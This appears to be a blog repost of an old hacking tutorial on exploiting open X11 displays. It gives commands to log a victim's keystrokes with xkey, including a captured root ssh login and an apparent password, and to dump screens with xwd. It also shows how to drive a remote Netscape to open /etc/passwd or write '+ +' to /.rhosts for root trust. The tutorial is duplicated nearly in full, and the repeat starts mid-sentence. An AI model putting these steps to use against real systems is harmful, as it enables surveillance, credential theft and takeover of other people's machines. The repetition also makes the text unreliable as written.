X11 displays are (normally) protected on a network level - that is - there
are no usernames and passwords involved. The display is actually a server
and it listens on port 6000 (TCP). Control for clients to connect to the
server is facilitated with the "xhost" command. By default it is set up in a
way that nobody can connect to the display - default deny. As soon as
programs are sharing the display (exporting an xtermto your display from
another host or whatever) the user of the display have to add the IP number
or DNS name of the client that wish to connect by running the command "xhost
+<client>". In theory this works perfectly nice, but in the real world
people tend to just enter "xhost +" which allows anyone to connect to the
display.
A host that is open for anyone to connect to the display is risking a lot,
and could possibly be compromised. There are a few nice things to do when
you find an open X11 display. One of the most common attacks is to capture
all the keystrokes that is entered on the victim's host. The program "xkey"
(available from www.hack.co.za) does this very neatly:
> xkey 196.37.xxx.14:0.0
..you wait..time passes...and then:
ssh -l root -<<Shift_R>>P 196.37.xxx.1
weirdshitometer
Its clear why we are excited about key captures. A open X11 display can also
be "copied" - the root window (the main window) can be copied, and
displayed. Each window have a unique ID - you can specify which window you
want to copy, but for a start let us get the root window:
> xwd -display 196.37.xxx.14 -root -silent -out /tmp/screendump
..wait for the transfer...
> xv /tmp/screendump
We are using xvto display the screen - xvcan read the xwdformat straight
off. The screen might include some interesting data - if you get a
screensaver - bad luck - use fingerto see when someone is active. To get a
list of windows that are open on the display you might want to issue the
command:
> xwininfo -display <victim> -all -root | grep \"
(extract)
0x3000e6f "Netscape: Find": ("findDialog_popup" "Netscape") 378x144+536+227
+536+227
0x1c0000c "FvwmButtons": ("FvwmButtons" "FvwmButtons") 385x68+0+0 +635+4
0x2400005 "xload": ("xload" "XLoad") 106x52+2+2 +637+6
0x2000002 "Desktop": ("FvwmPager" "FvwmModule") 105x64+277+2 +912+6
0x30001ec "Netscape": ("communicator-4_72_bin" "Netscape") 1x1+0+0 +0+0
0x3000172 "Communicator Bookmarks for Roelof Temmingh": ("bookmarks"
"Netscape") 872x622+10+10 +10+10
0x300001c " ": ("mozillaComponentBar" "Netscape") 5x5+50+50 +50+50
0x3000001 "Netscape": ("communicator-4.72.bin" "Netscape") 1x1+0+0 +0+0
If the victim is using more than one virtual screen you will be able to see
the other screen listed (you won't see it with xwd). With a bit of luck you
get a Netscape browser open. To get Netscape open on an open X11 display is
very good news as you can remotely control Netscape. Fancy telling Netscape
to open /etc/passwdand doing another screen capture? Here is how :
> netscape -display <victim> -remote 'openFile(/etc/passwd)'
> xwd -display <victim> -root -silent -out /tmp/netscape_
> xv /tmp/netscape
You can even tell Netscape to write files. It won't work trying to overwrite
files - you will find a nasty Netscape popup, but you can write files that
do not exist. You could create a page with "+ +"on it, redirect the browser
to the page, and, if Netscape is running as root, save it to /.rhosts. Be
sure to have a close look at http://home.netscape.com/newsref/std/x-remote.htmlif you find an open X11 running Netscape.
In theory you could also send keystrokes to an open X display. I found the
program "xpusher.c" at http://www.hack.co.za, fiddled around with it, but it
does not seem to work. There might be other programs around. Keep looking...
are no usernames and passwords involved. The display is actually a server
and it listens on port 6000 (TCP). Control for clients to connect to the
server is facilitated with the "xhost" command. By default it is set up in a
way that nobody can connect to the display - default deny. As soon as
programs are sharing the display (exporting an xtermto your display from
another host or whatever) the user of the display have to add the IP number
or DNS name of the client that wish to connect by running the command "xhost
+<client>". In theory this works perfectly nice, but in the real world
people tend to just enter "xhost +" which allows anyone to connect to the
display.
A host that is open for anyone to connect to the display is risking a lot,
and could possibly be compromised. There are a few nice things to do when
you find an open X11 display. One of the most common attacks is to capture
all the keystrokes that is entered on the victim's host. The program "xkey"
(available from www.hack.co.za) does this very neatly:
> xkey 196.37.xxx.14:0.0
..you wait..time passes...and then:
ssh -l root -<<Shift_R>>P 196.37.xxx.1
weirdshitometer
Its clear why we are excited about key captures. A open X11 display can also
be "copied" - the root window (the main window) can be copied, and
displayed. Each window have a unique ID - you can specify which window you
want to copy, but for a start let us get the root window:
> xwd -display 196.37.xxx.14 -root -silent -out /tmp/screendump
..wait for the transfer...
> xv /tmp/screendump
We are using xvto display the screen - xvcan read the xwdformat straight
off. The screen might include some interesting data - if you get a
screensaver - bad luck - use fingerto see when someone is active. To get a
list of windows that are open on the display you might want to issue the
command:
> xwininfo -display <victim> -all -root | grep \"
(extract)
0x3000e6f "Netscape: Find": ("findDialog_popup" "Netscape") 378x144+536+227
+536+227
0x1c0000c "FvwmButtons": ("FvwmButtons" "FvwmButtons") 385x68+0+0 +635+4
0x2400005 "xload": ("xload" "XLoad") 106x52+2+2 +637+6
0x2000002 "Desktop": ("FvwmPager" "FvwmModule") 105x64+277+2 +912+6
0x30001ec "Netscape": ("communicator-4_72_bin" "Netscape") 1x1+0+0 +0+0
0x3000172 "Communicator Bookmarks for Roelof Temmingh": ("bookmarks"
"Netscape") 872x622+10+10 +10+10
0x300001c " ": ("mozillaComponentBar" "Netscape") 5x5+50+50 +50+50
0x3000001 "Netscape": ("communicator-4.72.bin" "Netscape") 1x1+0+0 +0+0
If the victim is using more than one virtual screen you will be able to see
the other screen listed (you won't see it with xwd). With a bit of luck you
get a Netscape browser open. To get Netscape open on an open X11 display is
very good news as you can remotely control Netscape. Fancy telling Netscape
to open /etc/passwdand doing another screen capture? Here is how :
> netscape -display <victim> -remote 'openFile(/etc/passwd)'
> xwd -display <victim> -root -silent -out /tmp/netscape_
> xv /tmp/netscape
You can even tell Netscape to write files. It won't work trying to overwrite
files - you will find a nasty Netscape popup, but you can write files that
do not exist. You could create a page with "+ +"on it, redirect the browser
to the page, and, if Netscape is running as root, save it to /.rhosts. Be
sure to have a close look at http://home.netscape.com/newsref/std/x-remote.htmlif you find an open X11 running Netscape.
In theory you could also send keystrokes to an open X display. I found the
program "xpusher.c" at http://www.hack.co.za, fiddled around with it, but it
does not seem to work. There might be other programs around. Keep looking...
No comments:
Post a Comment